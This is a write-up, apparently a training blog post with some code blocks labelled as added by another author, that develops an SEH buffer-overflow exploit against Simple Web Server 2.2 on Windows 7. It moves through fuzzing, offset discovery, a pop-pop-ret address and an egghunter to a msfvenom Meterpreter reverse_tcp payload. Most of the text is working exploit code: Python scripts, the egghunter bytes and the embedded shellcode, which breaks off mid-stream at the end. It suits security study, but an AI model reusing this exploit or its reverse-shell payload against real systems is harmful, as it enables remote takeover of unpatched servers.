
Simple Web Server 2.2 Buffer Overflow (SEH)

Recently I have been working through the Offensive Security Cracking the Perimeter course.  To practice some of the concepts I decided to take a look at some known vulnerable applications.  My goal was to find a vulnerability and get RCE without looking at the known vulnerabilities or exploits.  This led me to Simple Web Server.

 

The Setup

Application: Simple Web Server 2.2 rc2 (Download from Exploit-DB)

Attacker: Kali Linux 2017.2 64-bit

Victim: Windows 7 Professional with SP1 32-bit

 

Fuzzing the Application

The first step is to find a crash by fuzzing the application.  We need to know what a legitimate request looks like, so we intercept one with Burp Suite and then hand it to Spike for fuzzing.

 

Capture a Sample Request

Below is a sample request; we need to replicate it in a Spike template.

GET / HTTP/1.1
Host: 10.10.100.133
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept-Language: en-US,en;q=0.8
Connection: close

 

Convert Request to a Spike Template

Here is the request in Spike format.

s_string("GET");
s_string(" ");
s_string("/");
s_string(" ");
s_string("HTTP/1.1");
s_string("\r\n");

s_string("Host:");
s_string(" ");
s_string("10.10.100.133");
s_string("\r\n");

s_string("User-Agent:");
s_string(" ");
s_string("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36");
s_string("\r\n");

s_string("Accept-Language:");
s_string(" ");
s_string("en-US,en;q=0.8");
s_string("\r\n");

s_string("Connection:");
s_string(" ");
s_string("close");
s_string("\r\n");

s_string("\r\n");

As it is, this template has no fuzz points, so everything would be sent verbatim.  Let's pick some things to fuzz: the HTTP method, the path of the GET request, and the Connection header value.  Each one becomes an s_string_variable(), and Spike numbers them from 0 in the order they appear (0 = method, 1 = path, 2 = Connection value).  Our resulting Spike template should look like this.

s_string_variable("GET");
s_string(" ");
s_string_variable("/");
s_string(" ");
s_string("HTTP/1.1");
s_string("\r\n");

s_string("Host:");
s_string(" ");
s_string("10.10.100.133");
s_string("\r\n");

s_string("User-Agent:");
s_string(" ");
s_string("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36");
s_string("\r\n");

s_string("Accept-Language:");
s_string(" ");
s_string("en-US,en;q=0.8");
s_string("\r\n");

s_string("Connection:");
s_string(" ");
s_string_variable("close");
s_string("\r\n");

s_string("\r\n");

 

Fuzzing the Application

Now we let Spike fuzz the application while we watch for a crash.  We load up Immunity Debugger, attach to the Simple Web Server process, and kick off Spike with the following command (the two trailing zeros are the variable index and string index to start from, useful for resuming after a crash).

generic_send_tcp 10.10.100.133 80 sws.spk 0 0

After a little trial and error, hitting some INT3 breakpoints along the way, we find an SEH overwrite!

 

The crash appears to have occurred while fuzzing the Connection value: Spike's output at the time of the crash was "Fuzzing Variable 2:14", i.e. variable 2 (the Connection value) and fuzz string 14.  Let's try to replicate the crash in Python.

Spike output at the crash: Fuzzing Variable 2:14
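As an added example (not part of the original post), here are the same three fuzz points as a small Python 3 fuzzer.  It mirrors Spike's ordering (variable 0 = method, 1 = path, 2 = Connection value, each walked through a list of string lengths) and adds the one thing Spike leaves to the debugger: after every case it re-sends the clean request to see whether the listener is still answering.  The target host and port and the length schedule are assumptions for illustration.

```python
#!/usr/bin/env python3
# Added example (not the post's code): a Spike-style fuzzer for the three
# fuzz points chosen in the template, with a liveness probe after each case.
import socket

HOST = "10.10.100.133"   # assumed: the Windows 7 victim from the write-up
PORT = 80

# Length schedule (assumed). Plain overlong strings only, so a crash maps
# to a single (variable, case) pair the way Spike's "Fuzzing Variable x:y" does.
LENGTHS = [64, 256, 1024, 2048, 4096, 5000, 8192]


def build_request(method=b"GET", path=b"/", connection=b"close"):
    """Rebuild the captured request with the three fuzzable fields substituted."""
    return (method + b" " + path + b" HTTP/1.1\r\n"
            b"Host: " + HOST.encode() + b"\r\n"
            b"User-Agent: Mozilla/5.0\r\n"
            b"Accept-Language: en-US,en;q=0.8\r\n"
            b"Connection: " + connection + b"\r\n"
            b"\r\n")


def fuzz_cases(lengths=LENGTHS):
    """Yield (variable, case, request) in Spike's order: every string for
    variable 0 (method), then variable 1 (path), then variable 2 (Connection)."""
    fields = ("method", "path", "connection")
    for var, field in enumerate(fields):
        for case, n in enumerate(lengths):
            yield var, case, build_request(**{field: b"A" * n})


def send_case(request, timeout=3.0):
    """Send one request. True if the server answered, False on refused /
    reset / timeout. A fuzzed Connection value may keep the socket open,
    so this result alone is not a crash signal; alive() decides."""
    try:
        with socket.create_connection((HOST, PORT), timeout=timeout) as s:
            s.sendall(request)
            return bool(s.recv(1024))
    except OSError:
        return False


def alive():
    """Liveness probe with the unmodified request."""
    return send_case(build_request())


def run():
    """Fuzz until the listener stops answering; report the case that did it."""
    for var, case, request in fuzz_cases():
        send_case(request)
        if not alive():
            print("crash after Fuzzing Variable %d:%d (length %d)"
                  % (var, case, LENGTHS[case]))
            return var, case
    print("no crash observed")
    return None


if __name__ == "__main__":
    run()
```

Running it with the debugger attached lets you match the reported (variable, case) pair against the length that was in flight, which is what the Python reproduction in the next section starts from.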

 

Replicating the Crash with a Python Script

I like to use a template to save some time so some of the variables are just defined here for future use.  We will start with 5000 bytes and see if this script triggers the crash.

#!/usr/bin/python
# Python 2: str is a byte string, so the request (and later the raw
# shellcode bytes) can be sent as-is.

####################################################################
# Application: Simple Web Server 2.2rc2                            #
# Author: VOSEC                                                    #
# Website: https://veilofsecurity.com                              #
# Tested OS: Windows 7 SP1 32bit                                   #
####################################################################

import socket
import sys

ip = "10.10.100.133"
port = 80

junk = "A"*4992     #filler; junk + jmp + retn = 5000 bytes
jmp = "B"*4         #will become nSEH
retn = "C"*4        #will become SEH
shellcode = ""      #placeholder for later

req = "GET / HTTP/1.1\r\n"
req += "Host: 10.10.100.133\r\n"
req += "Connection:" + junk + jmp + retn + shellcode + "\r\n"
req += "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(req)
s.close()

 

Success!  The script works and we get the same SEH overwrite.

 

Exploiting the Vulnerability

Now to find the offset at which the SEH record (nSEH and SEH) is overwritten.

 

Finding the Offset for the Return Address

We need to modify our Python script to use a unique pattern to identify the offset.  We will use pattern_create from Metasploit.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4992

We insert the pattern into our Python script and trigger the crash again.

junk = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9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Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd"
        "0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3")
jmp = "B"*4
retn = "C"*4
shellcode = ""

 

After triggering the crash again we use a mona command to locate the offset; it scans memory for the cyclic pattern and reports where the nSEH and SEH fields fall within it.

!mona findmsp

[Screenshot: !mona findmsp output reporting the nSEH offset]
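As an added example (not the post's code), pattern_create and pattern_offset re-implemented in Python 3.  It generates the same cyclic pattern and maps a value read from the debugger's SEH chain back to an offset, either from the little-endian DWORD shown in the chain or from the four ASCII bytes seen in the dump, which is the lookup !mona findmsp performs for you.  For the 4992-byte pattern above, the bytes at offset 2280 are "Cy0C" and those at 2284 are "y1Cy", so a SEH handler of 0x79433179 in the chain resolves to the offsets used in the rest of the write-up.

```python
#!/usr/bin/env python3
# Added example (not from the original post): Python re-implementation of
# Metasploit's pattern_create / pattern_offset, sufficient to check the
# 4992-byte pattern above and to resolve values read from the SEH chain.
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Build the cyclic 'Aa0Aa1Aa2...' pattern. Every 3-byte triplet is
    unique for the first 26*26*10*3 = 20280 bytes, so any 4-byte window
    identifies its position."""
    out = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=4992):
    """Offset of VALUE in the pattern, or -1. VALUE may be the ASCII bytes
    seen in a memory dump, or the DWORD the debugger shows for EIP / the
    SEH handler (int or '0x...' string), which is little-endian in memory."""
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str) and value.lower().startswith("0x"):
        needle = struct.pack("<I", int(value, 16))
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


def seh_offsets(nseh, seh, length=4992):
    """Offsets of the two overwritten SEH record fields. A clean, contiguous
    overwrite has the handler (SEH) exactly 4 bytes after nSEH."""
    n = pattern_offset(nseh, length)
    s = pattern_offset(seh, length)
    return n, s, (n >= 0 and s == n + 4)


if __name__ == "__main__":
    print(pattern_create(4992)[2280:2288])        # b'Cy0Cy1Cy'
    print(seh_offsets(0x43307943, 0x79433179))    # (2280, 2284, True)
```

The consistency flag from seh_offsets() is the check worth making before moving on: if SEH does not land 4 bytes after nSEH, the two values came from different copies of the buffer or from a partial overwrite, and the offset should not be trusted yet.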

 

Now to find a pop-pop-ret address we can use.

 

Finding a Return Address

To find a pop-pop-ret we will use the following mona command.

!mona seh

Perfect, mona lists several usable pop-pop-ret addresses.  We will use 0x6aac10b4.  Whatever address is chosen, it must live in a module without SafeSEH (and preferably without ASLR or rebasing), which is what mona's default module filter selects for, and its bytes must not contain characters that would break the request, here 0x00, 0x0a and 0x0d.

 

Let’s add our newly discovered information to our exploit.

junk = "A"*2280           #nSEH offset from !mona findmsp
jmp = "B"*4               #nSEH
retn = "\xb4\x10\xac\x6a" #SEH - 0x6aac10b4 from !mona seh, written little-endian
shellcode = "C"*2000      #2000 bytes after SEH, to see how much room a forward jmp would have

 

We are now able to trigger the crash and, after the pop-pop-ret, land at the beginning of our 4 B's (nSEH).  Following the execution in the debugger shows that a jump forward is not going to give us enough space for reverse-shell shellcode, so we will use a 2-byte short jmp backward instead.  Before we add the jmp instruction, let's generate some egghunter shellcode and add it to our script.

 

Adding Egghunter Shellcode

We can create the egghunter shellcode using another mona command.

!mona egg -t W00T

We then update our script to include the egg and the egghunter.  Because the egg and the egghunter now sit in front of nSEH, the junk shrinks by 8 + 32 bytes so that nSEH still lands at offset 2280.

 

junk = "A"*2240              #2280 (nSEH offset from !mona findmsp) - 8 (egg) - 32 (egghunter)
egg = "W00TW00T"             #the egg our egghunter is looking for
shellcode = ""               #placeholder for later
#egghunter code is 32bytes
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
jmp = "\xeb\xde\x90\x90"     #nSEH - jmp short -34: from the end of the 2-byte jmp, back over the 32-byte egghunter to its first byte
retn = "\xb4\x10\xac\x6a"    #SEH - 0x6aac10b4 from !mona seh, written little-endian

req = "GET / HTTP/1.1\r\n"
req += "Host: 10.10.100.133\r\n"
req += "Connection:" + junk + egg + shellcode + egghunter + jmp + retn + "\r\n"
req += "\r\n"

 

Testing our script results in a crash, the short jmp lands on the egghunter, and the egghunter successfully finds our egg.  Now we can add real shellcode after the egg.

 

Getting a Reverse Shell

The final step: we need to generate some shellcode and add it to our exploit.  We will use msfvenom to generate a Meterpreter payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.100.103 LPORT=4444 exitfunc=seh -e x86/alpha_mixed -f python

msfvenom gives a fairly large payload (734 bytes), but we have the room for it, and the alpha_mixed encoder keeps the payload clear of the bytes that would break the HTTP header (0x00, 0x0a, 0x0d).  exitfunc=seh lets the payload exit through the exception handler rather than killing the process outright.  Our final script looks like the following.
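Before dropping 734 bytes into the buffer, this added example (not from the original post) builds the Connection-header payload in the layout used above from the offsets and bytes already found (nSEH at 2280, the 32-byte egghunter, pop-pop-ret 0x6aac10b4) and checks the invariants statically instead of in the debugger: nSEH still at 2280 whatever the shellcode length, the short jmp landing on the egghunter's first byte, the shellcode immediately following the egg, and none of 0x00/0x0a/0x0d anywhere in the payload.  The 734 "C" bytes are a constructed stand-in for the msfvenom output; the request framing is taken from the script.

```python
#!/usr/bin/env python3
# Added example (not the post's code): build the junk|egg|shellcode|egghunter|
# nSEH|SEH layout from the write-up's values and verify it before sending.
import struct

NSEH_OFFSET = 2280                      # from !mona findmsp
EGG = b"W00TW00T"
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
             b"\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"
             b"\xff\xe7")                # !mona egg -t W00T, 32 bytes
POP_POP_RET = 0x6aac10b4                # from !mona seh
BAD = b"\x00\x0a\x0d"                   # NUL truncates, CR/LF ends the header


def short_jmp_back(distance):
    """Encode `jmp rel8` that lands DISTANCE bytes before its own first byte.
    rel8 is relative to the end of the 2-byte instruction, hence -(distance+2)."""
    rel = -(distance + 2)
    if not -128 <= rel <= 127:
        raise ValueError("distance %d does not fit a short jmp" % distance)
    return b"\xeb" + struct.pack("b", rel)


def build_payload(shellcode):
    """junk | egg | shellcode | egghunter | nSEH | SEH, with junk sized so
    nSEH lands at NSEH_OFFSET regardless of the shellcode length."""
    junk_len = NSEH_OFFSET - len(EGG) - len(shellcode) - len(EGGHUNTER)
    if junk_len < 0:
        raise ValueError("shellcode too large to place before nSEH")
    nseh = short_jmp_back(len(EGGHUNTER)) + b"\x90\x90"
    seh = struct.pack("<I", POP_POP_RET)
    return b"A" * junk_len + EGG + shellcode + EGGHUNTER + nseh + seh


def check_layout(payload, shellcode):
    """The invariants normally confirmed in the debugger, computed statically."""
    nseh_at = len(payload) - 8
    egghunter_at = nseh_at - len(EGGHUNTER)
    rel8 = struct.unpack("b", payload[nseh_at + 1:nseh_at + 2])[0]
    jmp_lands_at = nseh_at + 2 + rel8
    egg_at = payload.find(EGG)
    after_egg = payload[egg_at + len(EGG):egg_at + len(EGG) + len(shellcode)]
    return {
        "junk_len": egg_at,
        "nseh_offset_ok": nseh_at == NSEH_OFFSET,
        "jmp_lands_on_egghunter": (jmp_lands_at == egghunter_at
                                   and payload[egghunter_at:nseh_at] == EGGHUNTER),
        "egg_followed_by_shellcode": egg_at >= 0 and after_egg == shellcode,
        "bad_chars": sorted({b for b in payload if b in BAD}),
        "seh_value": struct.unpack("<I", payload[nseh_at + 4:nseh_at + 8])[0],
    }


def build_request(payload, host=b"10.10.100.133"):
    """Wrap the payload in the request the write-up sends."""
    return (b"GET / HTTP/1.1\r\nHost: " + host + b"\r\n"
            b"Connection:" + payload + b"\r\n\r\n")


if __name__ == "__main__":
    stand_in = b"C" * 734          # constructed stand-in for the 734-byte payload
    p = build_payload(stand_in)
    print(check_layout(p, stand_in))
```

Substituting the real msfvenom output for the stand-in reproduces the final script's numbers (junk of 1506 bytes, 2288-byte payload); an empty shellcode reproduces the 2240-byte junk of the egghunter test above.  A non-empty "bad_chars" list, or a False flag, means the layout would not survive the trip through the HTTP parser or would jump to the wrong place, and is cheaper to catch here than in Immunity.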

#!/usr/bin/python
# Python 2: str is a byte string, so the raw shellcode bytes are sent as-is.

####################################################################
# Application: Simple Web Server 2.2rc2                            #
# Author: VOSEC                                                    #
# Website: https://veilofsecurity.com                              #
# Tested OS: Windows 7 SP1 32bit                                   #
####################################################################

import socket
import sys

ip = "10.10.100.133"
port = 80

junk = "A"*1506            #2280 (nSEH offset from !mona findmsp) - 8 (egg) - 734 (shellcode) - 32 (egghunter)
egg = "W00TW00T"           #the egg our egghunter is looking for
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.100.103 LPORT=4444 exitfunc=seh -e x86/alpha_mixed -f python
#shellcode is 734 bytes
shellcode = ""
shellcode += "\x89\xe1\xdb\xc6\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x39\x78\x4d"
shellcode += "\x52\x77\x70\x75\x50\x45\x50\x55\x30\x4b\x39\x6a\x45"
shellcode += "\x74\x71\x69\x50\x71\x74\x4e\x6b\x32\x70\x50\x30\x6e"
shellcode += "\x6b\x46\x32\x44\x4c\x4c\x4b\x61\x42\x44\x54\x4e\x6b"
shellcode += "\x42\x52\x66\x48\x46\x6f\x6c\x77\x63\x7a\x64\x66\x35"
shellcode += "\x61\x69\x6f\x6e\x4c\x67\x4c\x33\x51\x71\x6c\x35\x52"
shellcode += "\x66\x4c\x57\x50\x6b\x71\x68\x4f\x74\x4d\x35\x51\x58"
shellcode += "\x47\x6b\x52\x79\x62\x56\x32\x51\x47\x4e\x6b\x66\x32"
shellcode += "\x54\x50\x4c\x4b\x30\x4a\x55\x6c\x6e\x6b\x42\x6c\x36"
shellcode += "\x71\x52\x58\x79\x73\x61\x58\x46\x61\x68\x51\x62\x71"
shellcode += "\x4c\x4b\x51\x49\x75\x70\x37\x71\x78\x53\x4e\x6b\x31"
shellcode += "\x59\x75\x48\x6b\x53\x35\x6a\x72\x69\x4e\x6b\x44\x74"
shellcode += "\x4e\x6b\x53\x31\x39\x46\x75\x61\x6b\x4f\x4c\x6c\x7a"
